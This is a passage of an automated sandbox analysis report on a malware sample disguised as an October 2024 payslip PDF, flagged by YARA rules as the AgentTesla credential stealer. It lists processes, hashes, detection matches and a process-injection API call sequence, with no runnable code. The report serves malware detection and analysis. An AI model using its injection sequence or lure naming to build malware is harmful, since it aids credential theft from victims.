                                            Start date:04/11/2024
                                            Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                            Imagebase:0xb20000
                                            File size:780'288 bytes
                                            MD5 hash:0D4985C828F3F9F6974B1602C92EE962
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2252894462.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2252894462.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2252894462.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:7
                                            Start time:04:13:20
                                            Start date:04/11/2024
                                            Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                            Imagebase:0xd80000
                                            File size:780'288 bytes
                                            MD5 hash:0D4985C828F3F9F6974B1602C92EE962
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:8
                                            Start time:04:13:21
                                            Start date:04/11/2024
                                            Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                            Imagebase:0xd00000
                                            File size:780'288 bytes
                                            MD5 hash:0D4985C828F3F9F6974B1602C92EE962
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4494723073.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4494723073.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4494723073.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false


                                              Execution Graph

                                              Execution Coverage:8.9%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:213
                                              Total number of Limit Nodes:10
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2033087910.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2740000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3f542f8fd529939ff08dd932d87d1fa58084d286b872a4cd7eac80254bdcd6dd
                                              • Instruction ID: ec2f94d64eee8639c91ad8558480728d8adeb5b660e6fd11ab79a0ae6fa2b43c
                                              • Opcode Fuzzy Hash: 3f542f8fd529939ff08dd932d87d1fa58084d286b872a4cd7eac80254bdcd6dd
                                              • Instruction Fuzzy Hash: 5851D870E0120C9FDB09DFA5D855AEEBBB2FF88304F14852AD409AB365DB359946CF80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2033087910.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2740000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8936962d979a232e1105334aa05ee41b421e18618a981f7b226c02e30b6460f3
                                              • Instruction ID: 4a4d434c7ac226b4be6335d97675fae1f1265dfeed1567749791d92156358ec6
                                              • Opcode Fuzzy Hash: 8936962d979a232e1105334aa05ee41b421e18618a981f7b226c02e30b6460f3
                                              • Instruction Fuzzy Hash: C651C670E0120C9FDB09DFA9D855AEEBBB6FF88304F148529D409AB364DB359945CF80

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 366 6d19b0c-6d19bad 369 6d19be6-6d19c06 366->369 370 6d19baf-6d19bb9 366->370 375 6d19c08-6d19c12 369->375 376 6d19c3f-6d19c6e 369->376 370->369 371 6d19bbb-6d19bbd 370->371 373 6d19be0-6d19be3 371->373 374 6d19bbf-6d19bc9 371->374 373->369 377 6d19bcb 374->377 378 6d19bcd-6d19bdc 374->378 375->376 380 6d19c14-6d19c16 375->380 384 6d19c70-6d19c7a 376->384 385 6d19ca7-6d19d61 CreateProcessA 376->385 377->378 378->378 379 6d19bde 378->379 379->373 381 6d19c39-6d19c3c 380->381 382 6d19c18-6d19c22 380->382 381->376 386 6d19c24 382->386 387 6d19c26-6d19c35 382->387 384->385 388 6d19c7c-6d19c7e 384->388 398 6d19d63-6d19d69 385->398 399 6d19d6a-6d19df0 385->399 386->387 387->387 389 6d19c37 387->389 390 6d19ca1-6d19ca4 388->390 391 6d19c80-6d19c8a 388->391 389->381 390->385 393 6d19c8c 391->393 394 6d19c8e-6d19c9d 391->394 393->394 394->394 395 6d19c9f 394->395 395->390 398->399 409 6d19e00-6d19e04 399->409 410 6d19df2-6d19df6 399->410 412 6d19e14-6d19e18 409->412 413 6d19e06-6d19e0a 409->413 410->409 411 6d19df8 410->411 411->409 415 6d19e28-6d19e2c 412->415 416 6d19e1a-6d19e1e 412->416 413->412 414 6d19e0c 413->414 414->412 418 6d19e3e-6d19e45 415->418 419 6d19e2e-6d19e34 415->419 416->415 417 6d19e20 416->417 417->415 420 6d19e47-6d19e56 418->420 421 6d19e5c 418->421 419->418 420->421 423 6d19e5d 421->423 423->423
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D19D4E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D19D4E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0

                                              Control-flow Graph
                                              • Graph starting at block 274af11-274af1e (node and edge listing omitted); the one named API call in the graph is GetModuleHandleW, in block 274b158-274b183.
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2033087910.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2740000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 027459C9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2033087910.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2740000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 027459C9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2033087910.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2740000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D194E8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0274D4E6,?,?,?,?,?), ref: 0274D5A7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2033087910.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2740000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D194E8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D19A00
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D1933E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0274D4E6,?,?,?,?,?), ref: 0274D5A7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2033087910.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2740000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D1933E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D19A00
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D19406
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D19406
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: f2cdb52cf22c5237814dae4012dc6cfe53aac5a47ba93c6df20410862f53557b
                                              • Instruction ID: 03efb2657b360d926037ec2b10a7e6f64daffab00c17980d82945ae26b4882cf
                                              • Opcode Fuzzy Hash: f2cdb52cf22c5237814dae4012dc6cfe53aac5a47ba93c6df20410862f53557b
                                              • Instruction Fuzzy Hash: D21137758002499FCB10DFAAC845AEFBFF5EF48310F248419E519AB250C779A940CFA5
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 9b2f48e256415bbc04617c3836c0c5065b140a162ca91ad742be60988ab26334
                                              • Instruction ID: 49a7612df0bc16b0144c265a50e89d79f6164fdcd785faaa8e41746df5741d6d
                                              • Opcode Fuzzy Hash: 9b2f48e256415bbc04617c3836c0c5065b140a162ca91ad742be60988ab26334
                                              • Instruction Fuzzy Hash: 7D1158B5D002488FDB20DFAAD4457EEFBF5EF88324F248419D01AAB250C7789944CFA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 2900e5ef04c8ea67188f82b930592b3ba1d499b49fff0324e0a0f58bc939f4f2
                                              • Instruction ID: fb6f62234815402cd243edd756c5c870ed57d1aeec0b06ee1401b06e5954e985
                                              • Opcode Fuzzy Hash: 2900e5ef04c8ea67188f82b930592b3ba1d499b49fff0324e0a0f58bc939f4f2
                                              • Instruction Fuzzy Hash: 35113AB1D003488FCB20DFAAD4457EEFBF5EF88314F248419D519A7250CB79A944CBA1
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0274B176
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2033087910.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2740000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: d2202746137d0a42e92ad94a6a0699889f0838167589734598732b6c6fbb2fa7
                                              • Instruction ID: 0981a4b5a7a7adcafc8123a8fb08c64ec64de3e9860684734b4b5713eb17e59c
                                              • Opcode Fuzzy Hash: d2202746137d0a42e92ad94a6a0699889f0838167589734598732b6c6fbb2fa7
                                              • Instruction Fuzzy Hash: 1211DFB6C002498FCB10DF9AC844A9EFBF5EF89214F14846AD429A7210D379A945CFA1
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D1C23D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 9eb45f81e293cba7ecbe3d10d2b8481545260b61eb123bb207fee7914cd3b9c4
                                              • Instruction ID: 17f11a790257129b4516b34919f6e90a9d2c79343b6a82adb69bf766e816c24f
                                              • Opcode Fuzzy Hash: 9eb45f81e293cba7ecbe3d10d2b8481545260b61eb123bb207fee7914cd3b9c4
                                              • Instruction Fuzzy Hash: 3F11D6B58003499FDB20DF99D845BDEBFF8EB48314F108459E558A7650C379A944CFA1
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D1C23D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: aee88d3708d4e82da90944e7ffc1dd349de66fe78b5224490431f4caf8612295
                                              • Instruction ID: 76070f1d30fa8d88d99b8b11f5d4b3407c35ff7d01fc36e4aa09a3a656f7ff14
                                              • Opcode Fuzzy Hash: aee88d3708d4e82da90944e7ffc1dd349de66fe78b5224490431f4caf8612295
                                              • Instruction Fuzzy Hash: AF1103B58003489FDB20DF9AD845BDEBFF8EB48314F108459E958A7210D3B9A944CFE1
                                              APIs
                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,054D77B9,?,?), ref: 054D7960
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044494192.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_54d0000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: 463660675d86df92325d0223daac719beed06b3320940e5dfcad886212c8aad1
                                              • Instruction ID: aff7f0e2a5c7c384b96a731d434a7a2511c1607fc887a1dd86ffea84c14a7bf4
                                              • Opcode Fuzzy Hash: 463660675d86df92325d0223daac719beed06b3320940e5dfcad886212c8aad1
                                              • Instruction Fuzzy Hash: BD1116B68003499FDB20DF9AC445BDEFBF4EF48320F24845AD558A7241D378A584CBA5
                                              APIs
                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,054D77B9,?,?), ref: 054D7960
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044494192.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_54d0000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: ab772f3931501a970cbf7111f9e5c1a871e544622f142187db50326fc1fdcfed
                                              • Instruction ID: 107ae41ce4b536395a5097f2d951aae540b0e0337c6ada41150d472371cca961
                                              • Opcode Fuzzy Hash: ab772f3931501a970cbf7111f9e5c1a871e544622f142187db50326fc1fdcfed
                                              • Instruction Fuzzy Hash: BD1122B68003498FDB20DF9AC445BEEFBF4EB48320F20845AD958A7341D378A944CFA5
                                              APIs
                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,054D77B9,?,?), ref: 054D7960
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044494192.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_54d0000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: bdee06f6efafb71da25d112b424522f35a4ce1faf06ee2096cb54df8924303f3
                                              • Instruction ID: 8a98277b43192cec632c4976f1d4b7c3aa0197048d2cd6fbc62a45cf2671ce40
                                              • Opcode Fuzzy Hash: bdee06f6efafb71da25d112b424522f35a4ce1faf06ee2096cb54df8924303f3
                                              • Instruction Fuzzy Hash: 0C1122B68003498FDB20DF9AC445BEEFBF4EB48320F20845AD958A7340D378A944CFA5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3712e6125f909f99e0589ac88eaf78614ff45f28b20f849302f465506cdb5aa4
                                              • Instruction ID: 0a7bd12d349ffe702344503c80a2f7313dd2461f4142c2fd9a1f02d089daed55
                                              • Opcode Fuzzy Hash: 3712e6125f909f99e0589ac88eaf78614ff45f28b20f849302f465506cdb5aa4
                                              • Instruction Fuzzy Hash: 7F51B074E006198FDB48DFAAC98469EFBF2BF88300F14C06AE418AB355DB349946CB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 687add2de3ba2b4d6970018f087689c22c1b9ff4fe521a354e361ab4faaf69c7
                                              • Instruction ID: 50afa3c881518f82c78521df4c562a1f9eb52d974c7a72cabe9c081a44f90b12
                                              • Opcode Fuzzy Hash: 687add2de3ba2b4d6970018f087689c22c1b9ff4fe521a354e361ab4faaf69c7
                                              • Instruction Fuzzy Hash: 4541B371E046599FDB08DFEAD8846AEFBF2AF89300F14C06AD418AB255DB745946CF40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 89fe257eacadf7bd9766f73dee7b3b089ae8cf6d3bdfe4b005c0263088ac9108
                                              • Instruction ID: 35068420940b49822e28f1186a70dc2d01d8c3ede2803c8a9f6940681865767d
                                              • Opcode Fuzzy Hash: 89fe257eacadf7bd9766f73dee7b3b089ae8cf6d3bdfe4b005c0263088ac9108
                                              • Instruction Fuzzy Hash: 8DC04C36D8D109FA9B904D8478050F8F73CDEDF572F013057D28EAA5014690C65585C4

                                              Execution Graph

                                              Execution Coverage:14.9%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:28
                                              Total number of Limit Nodes:6

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-3723351465

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q
                                              • API String ID: 0-127220927
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $
                                              • API String ID: 0-3993045852

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-1273862796

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-3723351465

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q
                                              • API String ID: 0-858218434

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q
                                              • API String ID: 0-182748909
                                              • Opcode ID: 4ac60aaeb77ad259c85af5987a4f94bca4124c885c656c08e0cdaa9672d44b84
                                              • Instruction ID: 685d77cc59f516ad58c85241fde08dee365b25267527fa1ab25bc5ceadca1294
                                              • Opcode Fuzzy Hash: 4ac60aaeb77ad259c85af5987a4f94bca4124c885c656c08e0cdaa9672d44b84
                                              • Instruction Fuzzy Hash: 77625C30A0020A8FCB55EF68E590A5DB7E6FF84314B20CA69D409DF369DB75ED46CB80

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fbq$XPbq$\Obq
                                              • API String ID: 0-4057264190
                                              • Opcode ID: bcc31f2504bfadd8cbddd8fdefc90dc746916915e269c5b9ba11b62c2747545a
                                              • Instruction ID: d500e3876c803bfe8b84d198d13ff4ded354427ab7a6242fd623486790a0da0b
                                              • Opcode Fuzzy Hash: bcc31f2504bfadd8cbddd8fdefc90dc746916915e269c5b9ba11b62c2747545a
                                              • Instruction Fuzzy Hash: 6D615E30F002199FEB54EFA4C8547AEBBF6FB88710F208529E509EB394DB758C458B91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              [Control-flow graph of the function at 109ee90; the graph includes a call to GlobalMemoryStatusEx]
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492695280.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_1090000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: c!
                                              • API String ID: 0-2715345226
                                              • Opcode ID: 675143fb84a1a63de5beaa5147aa4ecfd8ec1d29b83983b25b8d14a084778270
                                              • Instruction ID: 515c419c21c303e202bafd7f9158028aa57b6522cfb7578d369c2e390721d28d
                                              • Opcode Fuzzy Hash: 675143fb84a1a63de5beaa5147aa4ecfd8ec1d29b83983b25b8d14a084778270
